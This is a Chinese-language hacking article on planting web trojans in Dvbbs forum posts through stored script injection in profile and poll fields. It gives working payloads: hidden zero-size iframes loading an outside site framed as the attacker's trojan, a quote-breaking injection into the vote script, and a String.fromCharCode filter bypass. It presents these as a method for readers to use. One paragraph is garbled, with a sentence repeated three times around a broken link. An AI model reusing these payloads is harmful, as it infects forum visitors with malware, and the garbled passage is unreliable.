上一篇:去除TCP/IP筛选 >>
新思路现动网新漏洞
相信大家都看过《终结动网最新挂马方法!》的文章了,其实这个漏洞已经出现了大概半月了,后来才被公布出来。利用方法就是在“修改个人联系方法”中的“个人主页”写入代码:
</script><iframe height=0 width=0 src="http://www.wuzhou.org"></iframe>
在msn中写入代码:
<script language=javascript>var actioninfo3='单帖屏蔽'
其中木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。 href="http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。/" target=_blank>http://www.wuzhou.org为你的网页木马。这样,我们发贴或者回帖,只要有人访问这个帖子就会跳转访问我们的木马。其原理就是对原代码进行欺骗,今天主要说的是动网的另一个挂马方法-----投票挂马。通过测试,发现动网的所有版本均存在这个漏洞。
首先,我们发表一个投票看看。如图1
我们看一下源文件:
<script language=javascript>var vote='ssssssssss';var votenum='0';var votetype='0';var voters='0';</script>
其中ssssssssss是我们自由写入的,那么我们能不能对源文件进行欺骗,从而让它运行我们的代码呢?打个比方,一个括号:,当我们在内写进)和(,那就变成了两个括号。道理是相同的,我们也可以这样进行代码欺骗。我们在发表投票中写入:
';var votenum='0';var votetype='0';var voters='0';</script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><script language=javascript>var vote='
如图2:
在这里顺便说一下,动网的投票功能没有进行严密的过滤,当写入的投票项目为网页代码时,代码照样可以执行,而且写入的代码并不按照它所说的“每行一个投票项目,最多10个”,并没有分行。发表投票后,查看源文件:
<script language=javascript>var vote='';var votenum='0';var votetype='0';var voters='0';</script><iframe src="http://www.wuzhou.org/" width="0" height="0"></iframe><script language=javascript>var vote='';var votenum='0';var votetype='0';var voters='0';</script>
代码是无法执行的,动网进行了过滤。再次饶过思路,动网只是对<和>进行过滤,对+'/等符号没有过滤。再次在投票那写入代码:
';document.all.popmenu.innerhtml=document.all.popmenu.innerhtml+string.fromcharcode(60)+'iframe frameborder=0 height=0 marginheight=0 marginwidth=0 scrolling=no src=http://www.wuzhou.org width=0'+string.fromcharcode(62)+string.fromcharcode(60)+'/iframe'+string.fromcharcode(62);var vote='1
如图:
发表后成功跳转了www.wuzhou.org这个站。如果我们把站改成我们的网页木马,那么一个木马贴就这样完成了。其实这只是动网代码欺骗的一小部分,还有不少的地方可以进行代码欺骗,比如用户头像,联系方法等。
后记:现在很多的程序作者并没有看到到代码欺骗这安全危害,在我看的很多网站程序,不管是asp还是php的,都有许多程序可以进行代码欺骗,希望这篇文章能起到抛砖引玉的效果,让各位朋友找到更多的漏洞。
()
下一篇:小命令增加Router的安全 >>
相关文章:
- · 赛门铁客防火墙D.o.s攻击代码
- · IE主页被修改的处理方法
- · Award BIOS的修改方法
- · Ghost 自动修改 机器名 IP地址
- · 关于对SQL注入80004005 及其它错误消息分析
- · 网络设计师考试资料—选择题及答案
- · 国际顶级域名后缀含义大全
- · 高级扫描技术及原理介绍
- · 宽带共享上网应用常见问题解答
- · 两则控制技巧让局域网上网更高效
- · 恶意代码清理技巧
- · Windows XP操作系统网络应用最新技巧
- · 菜鸟破解之软件自己显示注册码
- · Win XP中使用上下文菜单实现磁盘自动整理
- · 利用VBS脚本让QQ永远在线
- · MySql本地提升演示
- · 入侵常见技术大曝光
- · QQ挂号升级方法
- · 无线攻防:破解WEP密钥过程全解
- · QQ验证消息反DDOS对方
- · 动网提升再提升之老鬼不是人
- · XP中CPU占用率100%原因及解决方法
- · 调整磁盘分区的PM
- · 分析Postbank_nl网络钓鱼的阴险伎俩
- · 强化TCP/IP堆栈安全 抵御拒绝服务式攻击
- · WinXP系统网络不能互访解决七招
- · 工具软件在网吧维护中的综合应用
- · 网吧的硬件组建及局域网相关技术
- · Linux开发中的常用命令
- · 用BIOS控制计算机安全
- · 重新认识NTFS文件系统的妙处
- · 轻松“提取”收藏夹中的秘密
- · 九大技巧,提升XP运行速度100%
- · CPC:每次点击成本
- · Linux阅读材料
- · 如何查找局域网故障
- · 入侵之简单通俗的讲解
- · 邮箱变网络硬盘不用安装软件